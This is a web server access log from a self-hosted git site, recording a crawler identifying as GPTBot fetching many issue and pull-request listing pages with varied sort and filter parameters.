"/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11352] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 